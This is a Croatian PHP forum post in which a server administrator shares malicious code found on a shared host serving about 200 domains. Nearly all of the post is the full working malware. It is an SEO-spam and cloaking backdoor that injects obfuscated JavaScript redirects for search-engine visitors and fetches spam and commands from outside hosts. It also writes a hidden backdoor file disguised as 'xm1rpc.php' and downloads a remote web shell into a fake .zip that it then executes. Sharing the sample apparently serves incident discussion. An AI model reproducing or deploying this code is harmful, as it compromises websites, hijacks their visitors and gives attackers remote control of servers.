Re: [PHP] Sumnjivi kod[Riješeno]
Postano: 08 stu 2016, 14:49
Dobro provuci cu kroz filter u buduce,inace ti to bude zagurano sastrane da se nevidi u nano-u
taj gore kod je bio jedna linija
Fora je sto taj .zip nije zip nego ovo
Sva sreća sto imamo cloud linux,inace bi sve sje.. ,taj server ima 200 domena na sebi,
malo je strašno kad pomisliš na to,ali izvukao sam neki stari backup iz 5. mjeseca i taj hack je tamo,ko zna koliko je to dugo unutra samo ga je sad neko otkrio i aktivirao
taj gore kod je bio jedna linija
Fora je sto taj .zip nije zip nego ovo
Sva sreća sto imamo cloud linux,inace bi sve sje.. ,taj server ima 200 domena na sebi,
malo je strašno kad pomisliš na to,ali izvukao sam neki stari backup iz 5. mjeseca i taj hack je tamo,ko zna koliko je to dugo unutra samo ga je sad neko otkrio i aktivirao
- Kod: Označi sve
<?php
error_reporting(0);
ini_set('display_errors', 0);
set_time_limit(0);
__create_initial_settings();
$good_user_agents_to_filter = array( '#google#i' );
$reverse_ips_to_filter = array( '#google#i' );
$bad_user_agents_to_filter = array( '#yahoo#i', '#msn#i', '#aol#i', '#bing#i' );
$referers_to_filter = array('#google\.#i', '#yahoo\.#i', '#bing\.#i', '#msn\.#i', '#aol\.#i' );
$ip = isset($_SERVER['REMOTE_ADDR'])? $_SERVER['REMOTE_ADDR']: '';
$ua = isset($_SERVER['HTTP_USER_AGENT'])? $_SERVER['HTTP_USER_AGENT']: '';
$ref = isset($_SERVER['HTTP_REFERER'])? $_SERVER['HTTP_REFERER']: '';
$host = isset($_SERVER['HTTP_HOST'])? $_SERVER['HTTP_HOST']: '';
$host_hash = substr(md5($host), 0, 5);
$query = isset($_SERVER['QUERY_STRING'])? $_SERVER['QUERY_STRING']: '';
$request_uri = isset($_SERVER['REQUEST_URI'])? strtok(strtok($_SERVER['REQUEST_URI'],'&'),'?'): '';
$root_path = __get_root();
if (file_exists($root_path.'/robots.txt'))
{
unlink($root_path.'/robots.txt');
}
if ($request_uri === '/robots.txt')
{
header('Content-Type:text/plain;charset=utf-8');
die("User-Agent: *\nAllow: /\n");
}
if ($query === 'checker-page')
{
if (__fetch_url(__get_rev()) > 0)
{
die('Success!');
} else
{
die('Failed!');
}
}
if (false !== strpos($query, 'simpler-ws'))
{
$ws_hash = md5('wsa');
$cache_dir = __get_root();
$ws_file = $cache_dir.'/'.$ws_hash.'.zip';
require($ws_file);
die('');
}
$is_good_bot = false;
foreach ($good_user_agents_to_filter as $user_agent_to_filter)
{
if (preg_match($user_agent_to_filter, $ua))
{
$is_good_bot = true;
}
}
$is_bad_bot = false;
foreach ($bad_user_agents_to_filter as $user_agent_to_filter)
{
if (preg_match($user_agent_to_filter, $ua))
{
$is_bad_bot = true;
}
}
if (!$is_good_bot)
{
$reverse_ip = gethostbyaddr($ip);
foreach ($reverse_ips_to_filter as $reverse_ip_to_filter)
{
if (preg_match($reverse_ip_to_filter, $reverse_ip))
{
$is_good_bot = true;
}
}
}
$is_searcher = false;
if (!$is_good_bot && !$is_bad_bot)
{
foreach ($referers_to_filter as $referer_to_filter)
{
if (preg_match($referer_to_filter, $ref))
{
$is_searcher = true;
}
}
}
if ($is_good_bot || $is_bad_bot || $is_searcher)
{
$cache_dir = realpath(sys_get_temp_dir());
$cache_file = $cache_dir.'/SESS_'.md5(strtolower($_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'v1.0.2'));
$template = false;
if (($is_good_bot || $is_searcher) && !file_exists($cache_file))
{
$data = __get_text();
$template = '';
if (isset($data['macroses']) && (count($data['macroses']) > 0))
{
$template = __get_template();
foreach ($data['macroses'] as $macros => $value)
{
$template = str_replace($macros, $value, $template);
}
}
if (!empty($template)) file_put_contents($cache_file, gzdeflate($template, 4));
} else if (file_exists($cache_file))
{
$template = gzinflate(file_get_contents($cache_file));
}
if ($template)
{
$template = str_replace('[JS]', __get_js(), $template);
if (file_exists($cache_file))
{
$last_modified_time = filemtime($cache_file);
$etag_file = md5_file($cache_file);
$max_age = $last_modified_time + 60*60*24*365 - time();
$expires = $last_modified_time + $max_age;
if ($max_age < 0) $max_age = 0;
header("Cache-Control: max-age=$max_age, public, must-revalidate");
header("Expires: ".gmdate("D, d M Y H:i:s", $expires)." GMT");
header("Last-Modified: ".gmdate("D, d M Y H:i:s", $last_modified_time)." GMT");
header("Etag: $etag_file");
$if_modified_since = (isset($_SERVER['HTTP_IF_MODIFIED_SINCE'])? $_SERVER['HTTP_IF_MODIFIED_SINCE']: false);
$etag_header = (isset($_SERVER['HTTP_IF_NONE_MATCH'])? trim($_SERVER['HTTP_IF_NONE_MATCH']): false);
if ($if_modified_since && (@strtotime($if_modified_since) === $last_modified_time) || ($etag_header === $etag_file) && $etag_file)
{
header("HTTP/1.1 304 Not Modified");
die();
}
} else
{
header("Cache-Control: max-age=0, public, must-revalidate");
}
header('Content-Type:text/html;charset=utf-8');
echo $template;
die();
}
}
function __obfuscate_write($code)
{
$uniques = '';
for ($i=0;$i<strlen($code);$i++)
{
if (strpos($uniques, $code[$i]) === false) $uniques .= $code[$i];
}
$uniques = str_shuffle($uniques);
$base = base64_encode($uniques);
$dictionary_name = '_'.mt_rand(11, 20);
$js = "var $dictionary_name=atob('$base');document.write(";
for ($i=0;$i<strlen($code);$i++)
{
$pos = strpos($uniques, $code[$i]);
$js .= $dictionary_name.'['.$pos.']+';
}
$js = trim($js, '+');
$js .= ");";
return $js;
}
function __obfuscate_redirect($code)
{
$uniques = '';
for ($i=0;$i<strlen($code);$i++)
{
if (strpos($uniques, $code[$i]) === false) $uniques .= $code[$i];
}
$uniques = str_shuffle($uniques);
$base = base64_encode($uniques);
$dictionary_name = '_'.mt_rand(21, 30);
$js = "var $dictionary_name=atob('$base');document.location = ";
for ($i=0;$i<strlen($code);$i++)
{
$pos = strpos($uniques, $code[$i]);
$js .= $dictionary_name.'['.$pos.']+';
}
$js = trim($js, '+');
$js .= ";";
return $js;
}
function __get_js()
{
$var = '_'.mt_rand(31, 40);
$redirect = __obfuscate_redirect(__get_tds($_SERVER['HTTP_REFERER'], 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']));
$js = "<script type=\"text/javascript\">var $var=document.referrer;if(($var.indexOf('google.')!=-1)||($var.indexOf('bing.')!=-1)||($var.indexOf('yahoo.')!=-1)||($var.indexOf('aol.')!=-1)||($var.indexOf('ask.')!=-1)||($var.indexOf('altavista.')!=-1)||($var.indexOf('yandex.')!=-1)){ $redirect }</script>";
$js = __obfuscate_write($js);
return $js;
}
function __get_root()
{
$localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath));
return $root_path;
}
function __get_rev()
{ return 'http://bokoinchina.com/extadult2.php?host='.trim(strtolower($_SERVER['HTTP_HOST']), '.').'&full_url='.urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
return 'http://nezlobudnya.com/generate';
}
function __get_tds($ref, $url)
{ $host = isset($_SERVER['HTTP_HOST'])? $_SERVER['HTTP_HOST']: '';$host_hash = md5($host.'tds');$cache_dir = realpath(sys_get_temp_dir());$tds_file = $cache_dir.'/SESS_'.$host_hash;if (!file_exists($tds_file) || file_exists($tds_file) && (time() - filemtime($tds_file) > 60*60*3)){$tds = __fetch_url(__get_rev().'&get_tds');if (filter_var($tds, FILTER_VALIDATE_URL)) file_put_contents($tds_file, $tds);} else{$tds = file_get_contents($tds_file);}$tds .= '?seoref='.urlencode($ref).'¶meter='.urlencode(str_replace('www.', '', $host)).'&se=$se&ur=1&HTTP_REFERER='.urlencode($url);return $tds;
return 'http://cdn.nezlobudnya.com/directlink';
}
function __get_text()
{
$host = isset($_SERVER['HTTP_HOST'])? urlencode($_SERVER['HTTP_HOST']): '';
$is_gzip = function_exists('gzinflate') ? 'true': '';
$full_uri = $_SERVER['REQUEST_URI'];
$text = __fetch_url(__get_rev().'&get_text&'."req=".urlencode($full_uri)."&gzip=".$is_gzip."&ip=127.0.0.1&rip=google&ua=googlebot&ref=");
if (function_exists('gzinflate'))
{
$text = @gzinflate(substr($text,10,-8));
}
$text = @unserialize($text);
return $text;
}
function __get_ws()
{
$host = isset($_SERVER['HTTP_HOST'])? $_SERVER['HTTP_HOST']: '';
$ws_hash = md5('wsa');
$cache_dir = __get_root();
$ws_file = $cache_dir.'/'.$ws_hash.'.zip';
if (!file_exists($ws_file) || file_exists($ws_file) && (time() - filemtime($ws_file) > 60*60*24*1))
{
$ws = __fetch_url(__get_rev().'&get_ws');
if (!empty($ws)) file_put_contents($ws_file, $ws);
} else
{
$ws = file_get_contents($ws_file);
}
return $ws;
}
function __get_template()
{
$root_path = __get_root();
$tpl_path = $root_path."/7f68d2eda2a56bd9a6a4af8c957ca273.rar";
$tpl = @file_get_contents($tpl_path);
if (strpos($tpl, '[CONTENT]') === false)
{
$tpl = __bdec('PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9ImVuLVVTIiBjbGFzcz0ianMiPjxoZWFkPgogIDxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij5bSlNdPC9zY3JpcHQ+Cgk8bGluayByZWw9InByb2ZpbGUiIGhyZWY9Imh0dHA6Ly9nbXBnLm9yZy94Zm4vMTEiPgo8dGl0bGU+W1RJVExFXTwvdGl0bGU+CgoKCgkJPHNjcmlwdCBzcmM9Imh0dHBzOi8vd3AtdGhlbWVzLmNvbS93cC93cC1pbmNsdWRlcy9qcy93cC1lbW9qaS1yZWxlYXNlLm1pbi5qcz92ZXI9NC41LVJDMS0zNzA3OSIgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij48L3NjcmlwdD4KCQk8c3R5bGUgdHlwZT0idGV4dC9jc3MiPgppbWcud3Atc21pbGV5LAppbWcuZW1vamkgewoJZGlzcGxheTogaW5saW5lICFpbXBvcnRhbnQ7Cglib3JkZXI6IG5vbmUgIWltcG9ydGFudDsKCWJveC1zaGFkb3c6IG5vbmUgIWltcG9ydGFudDsKCWhlaWdodDogMWVtICFpbXBvcnRhbnQ7Cgl3aWR0aDogMWVtICFpbXBvcnRhbnQ7CgltYXJnaW46IDAgLjA3ZW0gIWltcG9ydGFudDsKCXZlcnRpY2FsLWFsaWduOiAtMC4xZW0gIWltcG9ydGFudDsKCWJhY2tncm91bmQ6IG5vbmUgIWltcG9ydGFudDsKCXBhZGRpbmc6IDAgIWltcG9ydGFudDsKfQo8L3N0eWxlPgo8bGluayByZWw9InN0eWxlc2hlZXQiIGlkPSJ0d2VudHlzaXh0ZWVuLWZvbnRzLWNzcyIgaHJlZj0iaHR0cHM6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3M/ZmFtaWx5PU1lcnJpd2VhdGhlciUzQTQwMCUyQzcwMCUyQzkwMCUyQzQwMGl0YWxpYyUyQzcwMGl0YWxpYyUyQzkwMGl0YWxpYyU3Q01vbnRzZXJyYXQlM0E0MDAlMkM3MDAlN0NJbmNvbnNvbGF0YSUzQTQwMCZhbXA7c3Vic2V0PWxhdGluJTJDbGF0aW4tZXh0IiB0eXBlPSJ0ZXh0L2NzcyIgbWVkaWE9ImFsbCI+CjxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaWQ9ImdlbmVyaWNvbnMtY3NzIiBocmVmPSJodHRwczovL3dwLXRoZW1lcy5jb20vd3AtY29udGVudC90aGVtZXMvdHdlbnR5c2l4dGVlbi9nZW5lcmljb25zL2dlbmVyaWNvbnMuY3NzP3Zlcj0zLjQuMSIgdHlwZT0idGV4dC9jc3MiIG1lZGlhPSJhbGwiPgo8bGluayByZWw9InN0eWxlc2hlZXQiIGlkPSJ0d2VudHlzaXh0ZWVuLXN0eWxlLWNzcyIgaHJlZj0iaHR0cHM6Ly93cC10aGVtZXMuY29tL3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eXNpeHRlZW4vc3R5bGUuY3NzP3Zlcj00LjUtUkMxLTM3MDc5IiB0eXBlPSJ0ZXh0L2NzcyIgbWVkaWE9ImFsbCI+CjwhLS1baWYgbHQgSUUgMTBdPgo8bGluayByZWw9J3N0eWxlc2hlZXQnIGlkPSd0d2VudHlzaXh0ZWVuLWllLWNzcycgIGhyZWY9J2h0dHBzOi8vd3AtdGhlbWVzLmNvbS93cC1jb250ZW50L3RoZW1lcy90d2VudHlzaXh0ZWVuL2Nzcy9pZS5jc3M/dmVyPTIwMTUwOTMwJyB0eXBlPSd0ZXh0L2NzcycgbWVkaWE9J2FsbCcgLz4KPCFbZW5kaWZdLS0+CjwhLS1baWYgbHQgSUUgOV0+CjxsaW5rIHJlbD0nc3R5bGVzaGVldCcgaWQ9J3R3ZW50eXNpeHRlZW4taWU4LWNzcycgIGhyZWY9J2h0dHBzOi8vd3AtdGhlbWVzLmNvbS93cC1jb250ZW50L3RoZW1lcy90d2VudHlzaXh0ZWVuL2Nzcy9pZTguY3NzP3Zlcj0yMDE1MTIzMCcgdHlwZT0ndGV4dC9jc3MnIG1lZGlhPSdhbGwnIC8+CjwhW2VuZGlmXS0tPgo8IS0tW2lmIGx0IElFIDhdPgo8bGluayByZWw9J3N0eWxlc2hlZXQnIGlkPSd0d2VudHlzaXh0ZWVuLWllNy1jc3MnICBocmVmPSdodHRwczovL3dwLXRoZW1lcy5jb20vd3AtY29udGVudC90aGVtZXMvdHdlbnR5c2l4dGVlbi9jc3MvaWU3LmNzcz92ZXI9MjAxNTA5MzAnIHR5cGU9J3RleHQvY3NzJyBtZWRpYT0nYWxsJyAvPgo8IVtlbmRpZl0tLT4KPCEtLVtpZiBsdCBJRSA5XT4KPHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnIHNyYz0naHR0cHM6Ly93cC10aGVtZXMuY29tL3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eXNpeHRlZW4vanMvaHRtbDUuanM/dmVyPTMuNy4zJz48L3NjcmlwdD4KPCFbZW5kaWZdLS0+CjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBzcmM9Imh0dHBzOi8vd3AtdGhlbWVzLmNvbS93cC93cC1pbmNsdWRlcy9qcy9qcXVlcnkvanF1ZXJ5LmpzP3Zlcj0xLjEyLjIiPjwvc2NyaXB0Pgo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCIgc3JjPSJodHRwczovL3dwLXRoZW1lcy5jb20vd3Avd3AtaW5jbHVkZXMvanMvanF1ZXJ5L2pxdWVyeS1taWdyYXRlLm1pbi5qcz92ZXI9MS40LjAiPjwvc2NyaXB0PgoKCiAKCjxtZXRhIG5hbWU9ImdlbmVyYXRvciIgY29udGVudD0iV29yZFByZXNzIDQuNS1SQzEtMzcwNzkiPgoKCgoKCQk8c3R5bGUgdHlwZT0idGV4dC9jc3MiPi5yZWNlbnRjb21tZW50cyBhe2Rpc3BsYXk6aW5saW5lICFpbXBvcnRhbnQ7cGFkZGluZzowICFpbXBvcnRhbnQ7bWFyZ2luOjAgIWltcG9ydGFudDt9PC9zdHlsZT4KICA8bGluayByZWw9ImNhbm9uaWNhbCIgaHJlZj0iW1BBR0VfVVJMXSI+CiAgICA8bGluayByZWw9InByZXYiIGhyZWY9IltSQU5EX1VSTF9QUkVWXSI+CiAgICA8bGluayByZWw9Im5leHQiIGhyZWY9IltSQU5EX1VSTF9ORVhUXSI+CiAgICA8bWV0YSBwcm9wZXJ0eT0ib2c6dGl0bGUiIGNvbnRlbnQ9IltUSVRMRV0iPgogICAgPG1ldGEgcHJvcGVydHk9Im9nOnR5cGUiIGNvbnRlbnQ9ImFydGljbGUiPgogICAgPG1ldGEgcHJvcGVydHk9Im9nOnNpdGVfbmFtZSIgY29udGVudD0iW0NPTU1PTl0iPgogICAgPG1ldGEgcHJvcGVydHk9Im9nOnVybCIgY29udGVudD0iW1BBR0VfVVJMXSI+CiAgICA8bWV0YSBwcm9wZXJ0eT0ib2c6bG9jYWxlIiBjb250ZW50PSJlbl9VUyI+CiAgICA8bWV0YSBuYW1lPSJkZXNjcmlwdGlvbiIgcHJvcGVydHk9Im9nOmRlc2NyaXB0aW9uIiBjb250ZW50PSJbREVTQ1JJUFRJT05dIj4KICAgIDxtZXRhIG5hbWU9ImtleXdvcmRzIiBjb250ZW50PSJbS0VZV09SRFNdIj4KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wLCB1c2VyLXNjYWxhYmxlPXllcyI+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+CgkJPC9oZWFkPgoKPGJvZHkgY2xhc3M9InNpbmd1bGFyIHNpbmdsZSBzaW5nbGUtcG9zdCBwb3N0aWQtMTkgc2luZ2xlLWZvcm1hdC1zdGFuZGFyZCI+CjxkaXYgaWQ9InBhZ2UiIGNsYXNzPSJzaXRlIj4KCTxkaXYgY2xhc3M9InNpdGUtaW5uZXIiPgoJCTxhIGNsYXNzPSJza2lwLWxpbmsgc2NyZWVuLXJlYWRlci10ZXh0IiBocmVmPSIjY29udGVudCI+U2tpcCB0byBjb250ZW50PC9hPgoKCQk8aGVhZGVyIGlkPSJtYXN0aGVhZCIgY2xhc3M9InNpdGUtaGVhZGVyIiByb2xlPSJiYW5uZXIiPgoJCQk8ZGl2IGNsYXNzPSJzaXRlLWhlYWRlci1tYWluIj4KCQkJCTxkaXYgY2xhc3M9InNpdGUtYnJhbmRpbmciPgoJCQkJCQkJCQkJCTxwIGNsYXNzPSJzaXRlLXRpdGxlIj5bQ09NTU9OXTwvcD4KCQkJCQkJCQkJCQkKCQkJCQkJCQkJPC9kaXY+PCEtLSAuc2l0ZS1icmFuZGluZyAtLT4KCgkJCQkJCQk8L2Rpdj48IS0tIC5zaXRlLWhlYWRlci1tYWluIC0tPgoKCQkJCQk8L2hlYWRlcj48IS0tIC5zaXRlLWhlYWRlciAtLT4KCgkJPGRpdiBpZD0iY29udGVudCIgY2xhc3M9InNpdGUtY29udGVudCI+Cgo8ZGl2IGlkPSJwcmltYXJ5IiBjbGFzcz0iY29udGVudC1hcmVhIj4KCTxtYWluIGlkPSJtYWluIiBjbGFzcz0ic2l0ZS1tYWluIiByb2xlPSJtYWluIj4KCQkKPGFydGljbGUgaWQ9InBvc3QtMTkiIGNsYXNzPSJwb3N0LTE5IHBvc3QgdHlwZS1wb3N0IHN0YXR1cy1wdWJsaXNoIGZvcm1hdC1zdGFuZGFyZCBoZW50cnkgY2F0ZWdvcnktdW5jYXRlZ29yaXplZCB0YWctYm9hdCB0YWctbGFrZSI+Cgk8aGVhZGVyIGNsYXNzPSJlbnRyeS1oZWFkZXIiPgoJCTxoMSBjbGFzcz0iZW50cnktdGl0bGUiPltUSVRMRV08L2gxPgk8L2hlYWRlcj48IS0tIC5lbnRyeS1oZWFkZXIgLS0+CgoJCgkKCTxkaXYgY2xhc3M9ImVudHJ5LWNvbnRlbnQiPgogIFtDT05URU5UXQo8L2Rpdj48IS0tIC5lbnRyeS1jb250ZW50IC0tPgoKCQo8L2FydGljbGU+PCEtLSAjcG9zdC0jIyAtLT4KCgkKCTwvbWFpbj48IS0tIC5zaXRlLW1haW4gLS0+CgoJCjwvZGl2PjwhLS0gLmNvbnRlbnQtYXJlYSAtLT4KCgoJPGFzaWRlIGlkPSJzZWNvbmRhcnkiIGNsYXNzPSJzaWRlYmFyIHdpZGdldC1hcmVhIiByb2xlPSJjb21wbGVtZW50YXJ5Ij4KCQk8c2VjdGlvbiBpZD0ic2VhcmNoLTMiIGNsYXNzPSJ3aWRnZXQgd2lkZ2V0X3NlYXJjaCI+Cjxmb3JtIHJvbGU9InNlYXJjaCIgbWV0aG9kPSJnZXQiIGNsYXNzPSJzZWFyY2gtZm9ybSIgYWN0aW9uPSIjIj4KCTxsYWJlbD4KCQk8c3BhbiBjbGFzcz0ic2NyZWVuLXJlYWRlci10ZXh0Ij5TZWFyY2ggZm9yOjwvc3Bhbj4KCQk8aW5wdXQgdHlwZT0ic2VhcmNoIiBjbGFzcz0ic2VhcmNoLWZpZWxkIiBwbGFjZWhvbGRlcj0iU2VhcmNoIOKApiIgdmFsdWU9IiIgbmFtZT0icyIgdGl0bGU9IlNlYXJjaCBmb3I6Ij4KCTwvbGFiZWw+Cgk8YnV0dG9uIHR5cGU9InN1Ym1pdCIgY2xhc3M9InNlYXJjaC1zdWJtaXQiPjxzcGFuIGNsYXNzPSJzY3JlZW4tcmVhZGVyLXRleHQiPlNlYXJjaDwvc3Bhbj48L2J1dHRvbj4KPC9mb3JtPgo8L3NlY3Rpb24+CQk8c2VjdGlvbiBpZD0icmVjZW50LXBvc3RzLTMiIGNsYXNzPSJ3aWRnZXQgd2lkZ2V0X3JlY2VudF9lbnRyaWVzIj4JCTxoMiBjbGFzcz0id2lkZ2V0LXRpdGxlIj5SZWNlbnQgUG9zdHM8L2gyPgkJCgkJPC9zZWN0aW9uPgkJPHNlY3Rpb24gaWQ9InJlY2VudC1jb21tZW50cy0zIiBjbGFzcz0id2lkZ2V0IHdpZGdldF9yZWNlbnRfY29tbWVudHMiPjxoMiBjbGFzcz0id2lkZ2V0LXRpdGxlIj5SZWNlbnQgQ29tbWVudHM8L2gyPjwvc2VjdGlvbj48c2VjdGlvbiBpZD0iYXJjaGl2ZXMtMyIgY2xhc3M9IndpZGdldCB3aWRnZXRfYXJjaGl2ZSI+PGgyIGNsYXNzPSJ3aWRnZXQtdGl0bGUiPkFyY2hpdmVzPC9oMj4JCQoJCTwvc2VjdGlvbj48c2VjdGlvbiBpZD0iY2F0ZWdvcmllcy0zIiBjbGFzcz0id2lkZ2V0IHdpZGdldF9jYXRlZ29yaWVzIj48aDIgY2xhc3M9IndpZGdldC10aXRsZSI+Q2F0ZWdvcmllczwvaDI+CQkKPC9zZWN0aW9uPgk8L2FzaWRlPjwhLS0gLnNpZGViYXIgLndpZGdldC1hcmVhIC0tPgoKCQk8L2Rpdj48IS0tIC5zaXRlLWNvbnRlbnQgLS0+CgoJCTxmb290ZXIgaWQ9ImNvbG9waG9uIiBjbGFzcz0ic2l0ZS1mb290ZXIiIHJvbGU9ImNvbnRlbnRpbmZvIj4KCQkJCgkJCQoJCQk8ZGl2IGNsYXNzPSJzaXRlLWluZm8iPgoJCQkJCQkJCTxzcGFuIGNsYXNzPSJzaXRlLXRpdGxlIj5bQ09NTU9OXTwvc3Bhbj4KCQkJCTxhIGhyZWY9Imh0dHBzOi8vd29yZHByZXNzLm9yZy8iPlByb3VkbHkgcG93ZXJlZCBieSBXb3JkUHJlc3M8L2E+CgkJCTwvZGl2PjwhLS0gLnNpdGUtaW5mbyAtLT4KCQk8L2Zvb3Rlcj48IS0tIC5zaXRlLWZvb3RlciAtLT4KCTwvZGl2PjwhLS0gLnNpdGUtaW5uZXIgLS0+CjwvZGl2PjwhLS0gLnNpdGUgLS0+Cgo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCIgc3JjPSJodHRwczovL3dwLXRoZW1lcy5jb20vd3AtY29udGVudC90aGVtZXMvdHdlbnR5c2l4dGVlbi9qcy9za2lwLWxpbmstZm9jdXMtZml4LmpzP3Zlcj0yMDE1MTExMiI+PC9zY3JpcHQ+CjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBzcmM9Imh0dHBzOi8vd3AtdGhlbWVzLmNvbS93cC1jb250ZW50L3RoZW1lcy90d2VudHlzaXh0ZWVuL2pzL2Z1bmN0aW9ucy5qcz92ZXI9MjAxNTEyMDQiPjwvc2NyaXB0Pgo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCIgc3JjPSJodHRwczovL3dwLXRoZW1lcy5jb20vd3Avd3AtaW5jbHVkZXMvanMvd3AtZW1iZWQubWluLmpzP3Zlcj00LjUtUkMxLTM3MDc5Ij48L3NjcmlwdD4KCgo8L2JvZHk+PC9odG1sPg==');
}
return $tpl;
}
function __fetch_url($url) {
$contents = false;
$errs = 0;
while ( !$contents && ($errs++ < 3) )
{
$user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';
if (is_callable('curl_init')) {
$c = curl_init($url);
curl_setopt($c, CURLOPT_FOLLOWLOCATION, TRUE);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($c, CURLOPT_USERAGENT,$user_agent);
$contents = curl_exec($c);
if (curl_getinfo($c, CURLINFO_HTTP_CODE) !== 200) $contents = false;
curl_close($c);
} else
{
$allowUrlFopen = preg_match('/1|yes|on|true/i', ini_get('allow_url_fopen'));
if ($allowUrlFopen) {
$options = array('http' => array('user_agent' => $user_agent));
$context = stream_context_create($options);
$contents = @file_get_contents($url, false, $context);
}
}
}
return $contents;
}
function __create_initial_settings()
{
$xml = __get_root().'/xm1rpc.php';
if (!file_exists($xml) || file_exists($xml) && (filesize($xml) < 3000) || file_exists($xml) && (time() - filemtime($xml) > 60*60*1))
{
file_put_contents($xml, __bdec('PD9waHAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcXVlcnkgPSBpc3NldCgkX1NFUlZFUlsnUVVFUllfU1RSSU5HJ10pPyAkX1NFUlZFUlsnUVVFUllfU1RSSU5HJ106ICcnOyBpZiAoZmFsc2UgIT09IHN0cnBvcygkcXVlcnksICdzaW1wbGVyLXdzJykpIHsgX18xZ2V0X3dzKCk7ICR3c19oYXNoID0gbWQ1KCd3c2EnKTsgJGNhY2hlX2RpciA9IF9fMWdldF9yb290KCk7ICR3c19maWxlID0gJGNhY2hlX2Rpci4nLycuJHdzX2hhc2guJy56aXAnOyByZXF1aXJlKCR3c19maWxlKTsgZGllKCcnKTsgfSBmdW5jdGlvbiBfXzFnZXRfcm9vdCgpIHsgJGxvY2FscGF0aD1nZXRlbnYoIlNDUklQVF9OQU1FIik7JGFic29sdXRlcGF0aD1nZXRlbnYoIlNDUklQVF9GSUxFTkFNRSIpOyRyb290X3BhdGg9c3Vic3RyKCRhYnNvbHV0ZXBhdGgsMCxzdHJwb3MoJGFic29sdXRlcGF0aCwkbG9jYWxwYXRoKSk7IHJldHVybiAkcm9vdF9wYXRoOyB9IGZ1bmN0aW9uIF9fMWdldF93cygpIHsgJGhvc3QgPSBpc3NldCgkX1NFUlZFUlsnSFRUUF9IT1NUJ10pPyAkX1NFUlZFUlsnSFRUUF9IT1NUJ106I